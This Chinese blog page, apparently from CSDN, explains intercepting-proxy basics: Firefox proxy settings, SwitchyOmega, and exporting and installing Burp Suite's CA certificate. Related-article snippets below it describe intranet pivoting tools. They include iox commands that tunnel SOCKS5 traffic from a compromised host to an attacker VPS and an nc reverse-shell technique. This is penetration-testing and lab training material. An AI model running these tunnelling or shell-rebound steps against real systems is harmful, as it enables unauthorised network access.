    浏览器,WEB服务器,代理工具三者之间的相互作用 “代理”可对经过的数据包进行 记录,拦截,修改,再次发送,丢弃等。 浏览器代理设置 步骤(火狐浏览器为例): 选项 -> 网络设置 -> 手动代理 如何快捷...

    代理工作原理

    浏览器,WEB服务器,代理工具三者之间的相互作用
    在这里插入图片描述
    “代理”可对经过的数据包进行 记录,拦截,修改,再次发送,丢弃等。

    浏览器代理设置

    步骤(火狐浏览器为例):
    选项 -> 网络设置 -> 手动代理
    在这里插入图片描述

    如何快捷切换代理:
    浏览器插件:Proxy Switcher(然而,这是需要钱的)
    相似的插件可以考虑:
    Proxy SwitchyOmega免费的
    在这里插入图片描述
    Proxy SwitchyOmega 开启的功能和手动代理配置HTTP是一样,端口要一致。

    常用的代理工具

    Burpsuite , Clarles , Fiddler

    以Burpsuite为例:
    它是基于Java环境,跨平台,功能强大,除了代理抓包,还有丰富的安全测试功能。
    在这里插入图片描述

    首先,设置监听端口:
    在这里插入图片描述
    然而,问题来了,不是在设置好监听端口和HTTP代理的一致是就可以的,Burpsuite的使用需要安装证书。

    证书的来源

    方法一:
    同时打开Burpsuite和HTTP手动代理:
    在火狐浏览器中URL地址输入:http://burp,下载CA Certificate
    在这里插入图片描述
    方法二:
    这里我来说一种从Burpsuite中导出证书的方法,每个Burpsuite都自带证书的:
    在这里插入图片描述
    在这里插入图片描述
    在这里插入图片描述
    这时会把证书导出到主目录中,如果我们已经安装好了VMtools,就可以直接从主目录中复制,粘贴到主机中(物理机)

    安装证书:

    打开火狐浏览器的证书管理
    在这里插入图片描述
    在这里插入图片描述
    在这里插入图片描述
    这就导入成功了。
    如果博友想具体看Burpsuite的代理功能,可以关注我的博客,会有一篇具体介绍的。

    Tips;
    或许有些博友在以上的各种操作都做了,但是还是无法进行抓包,我也总结了一下网上的方法,各位可以试一试。

    1. 有些问题可能在浏览器HTTP代理的地方
      在浏览器URL栏中输入 about:config 进行高级首选
      然后查找network.proxy.allow_hijacking_localhost 双击使得后面的false变为true
      在这里插入图片描述
      在这里插入图片描述
      后面当开启Burpsuite进行抓包时,浏览器显示“不是私密连接”类似的字样,一般来说就是没有成功导入证书。

    (各位博友可以试一试,然而在我亲试的情况下,是不需要做出修改的,但不好说不同的博友情况)

    展开全文
  • SOCKS代理工具EarthWorm、sSoks

    千次阅读 2022-02-10 13:12:12
    1 常用SOCKS代理工具 SOCKS是一种代理服务,可以简单地将一端的系统连接到另一端。SOCKS支持多种协议,包括HTTP、FTP等。 SOCKS4:只支持TCP协议 SOCKS5:支持TCP、UDP、各种身份验证机制等,其标准端口为1080,...
  • 代理工具之iox

    千次阅读 2021-09-22 21:00:46
    建立socks5代理 1、肉机开启socks5 ./iox proxy -l 1080 2、vps开启监听 ./iox proxy -l 9999 -l 1080 3、肉机执行转发 ./iox proxy -r 1.1.1.1:9999 4、socks5代理地址为 1.1.1.1:1080 ...
  • 声明:贝塔安全实验室...reGeorg+Proxifier代理工具0x01 reGeorg是reDuh的继承者,利用了会话层的socks5协议,结合Proxifier使用效率更高,Proxifier是一款功能非常强大的socks5客户端,可以让不支持通过代理服务..
  • IP代理工具 IP代理工具 IP代理工具 IP代理工具 IP代理工具 IP代理工具 IP代理工具 IP代理工具 IP代理工具 IP代理工具
  • netsh interface portproxy 命令作为 IPv4 和 IPv6 网络与应用程序之间的代理 。 可以通过以下方式使用这些命令建立代理服务: 发送到 IPv4 配置的其他计算机和应用程序的 IPv4 配置的计算机和应用程序消息。 ...
  • Sockscap64可以使Windows网络应用程序来访问网络而不需要对这些应用程序做任何修改,即使某些本身不支持SOCKS代理的应用程序通过Sockscap64之后都可以实现代理访问。文末附下载链接。 实验记录 配置代理并测试,ip和...
  • 快速反向代理工具

    千次阅读 2019-03-29 10:27:52
    GitHub:https://github.com/fatedier/frp
  • windows 32 最新破解文件,需要安装的原文件下载官方链接在压缩文件中了
  • Whistle强大的WEB调试代理工具

    万次阅读 2019-07-29 00:09:56
    whistle(读音[ˈwɪsəl],拼音[wēisǒu])基于Node实现的跨平台web调试代理工具,类似的工具有Windows平台上的Fiddler,主要用于查看、修改HTTP、HTTPS、Websocket的请求、响应,也可以作为HTTP代理服务器使用,...
  • 初识whistle代理工具

    千次阅读 2016-09-04 18:35:36
    whistle介绍: Whistle是支付宝开发的又一强大的类似... Whistle也是nodejs开发的跨平台web调试代理工具,查看、修改或构造http(s)、websocket请求响应数据。 工具地址:https://github.com/avwo/whistle  介
  • web调试代理工具Whistle

    千次阅读 2018-05-10 10:50:02
    由于最近在学习微信小程序开发,项目中用到了https代理请求,所以用到了基于Node实现的跨平台web调试代理工具Whistle,在此做一记录。完成https代理请求总共需要5个步骤。一、安装Node.js下载地址:...
  • Kali中常用的代理工具以及使用

    千次阅读 2019-04-01 08:22:47
    常用的代理工具 Mitmproxy功能介绍 Mitmproxy功能使用 利用mitmproxy实现端口的监听 mitmproxy -p *(监听端口) 配置客户端:点击Menu->Preference->NetWork Proxy->Setting->Manual proxy ...
  • 手机或者浏览器使用该代理端口 ,访问即可看到抓到数据包  操作说明 按键 说明 i 可输入需要拦截的文件或者域名(逗号需要用\来做转译,栗子:feezu.cn) a 放行请求 A ...
  • 内网渗透 | FRP代理工具详解

    千次阅读 2021-12-07 13:22:06
    其实,对于FRP穿透工具来说,它和端口转发有所不同,端口转发是只会进行单个端口的流量转发,但是这在渗透中往往是不行的,我们通过通过FRP进行内网的全流量的数据代理,像FRP可以代理全端口、全流量的数据,这样我
  • 内网代理——常用工具

    千次阅读 2021-12-28 22:46:24
    端口转发工具lcx Web代理脚本regeorg Shell反弹脚本nc 、VPN nc:nc首先对公网主机端口进行监听,再到内网输入公网IP,端口号,以及执行文件,比如cmd.exe,就可以成功反弹内网主机的shell 第一个是 LCX 对 ...
  • APP安全——抓包代理工具的设置

    千次阅读 2020-08-17 20:32:32
    为方便您的阅读,可点击下方蓝色字体,进行跳转↓↓↓ 01 环境介绍 02 安卓模拟器设置 03 BurpSuite设置 04 添加证书 05 抓包测试 01 环境介绍 操作环境:Windows 10 操作工具: 1、BurpSuite:抓包代理工具。...
  • 4、配置代理,代开手机wifi,在手机连接的wifi上填写代理,IP就是电脑的IP,端口就是8888 5、在配置过程中可能会一直出现creation of the root certificate was not successful的报错。这个使用需要打开cmd执行...
  • 理论上,任何接入互联网的计算机都是可访问的,但是如果目标主机处于内网,而我们又想和该目标主机进行通信的话,就需要借助一些端口转发工具来达到我们的目的注:文中提到的所有工具下载地址 ...
  • 很多开发者都需要使用代理工具来调试接口,查看数据等等,但是有时候发现打开代理工具之后,代理工具同时也拦截了电脑的所有网络请求,导致电脑访问网站时提示(您的连接不是私密连接)。。。 造成这种问题的...
  • Fiddler-强悍开源HTTP调试代理工具

    千次阅读 2014-07-04 21:26:18
    Fiddler-强悍开源HTTP调试代理工具 发布于:2013-1-10 9:10:55来自【群】 软件库 编辑 前言: 最近小A看到致友上掀起了一波抓包热......于是趁热上来分享一下Fiddler 小软介绍: Fiddler是...
  • 代理工具SwitchyOmega配置

    千次阅读 2020-05-29 10:46:30
    SwitchyOmega一个代理设置工具 1. 先关掉谷歌,然后设置谷歌快捷方式的属性 然后在目标最后加上 -enable-easy-off-store-extension-install 注意-前有空格 我的“目标”是这样子:"C:\Program Files ...
  • 在linux下,有时候我们想给一个程序设置代理,但是程序自身却不具备设置代理的配置选项,这时候并不是无法给程序设置代理,今天奶牛为大家推荐一款比较实用的linux下的自定义设置程序代理工具proxychains。工具的...
  • Go-Proxy-Checker是一款基于Go编写的高性能HTTP/HTTPS代理服务器验证工具。 能够快速的验证你提供的代理列表中有哪些代理可用(是否高匿、是否支持HTTPS),仅需要简单的一条命令即可完成验证。 经过Benchmark性能...
  • 在Moriarty Corp靶场下使用Venom工具穿透内网 工具说明:https://github.com/Dliv3/Venom 编译好的可执行文件:https://github.com/Dliv3/Venom/releases admin监听端口,agent发起连接: ./admin_linux_x64 -lport ...
  • 很多开发者都需要使用代理工具来调试接口,查看数据等等,但是有时候发现打开代理工具之后,代理工具同时也拦截了电脑的所有网络请求,导致电脑访问网站时提示(您的连接不是私密连接)。。。 造成这种问题的原因...
  • 工具----5、浏览器代理插件与burpsuite

    千次阅读 2021-03-25 09:18:41
    1、火狐浏览器使用的代理插件为:Foxyproxy,我们在附件组件处直接搜索即可。 2、点进去下载 3、到FoxyProxy界面,配置IP及端口号即可。 4、我们在使用的时候选择bp,不使用时选择关闭。 二、谷歌/Edge浏览器 1...

空空如也

空空如也

1 2 3 4 5 ... 20
收藏数 459,991
精华内容 183,996
关键字:

代理工具

友情链接: k5.zip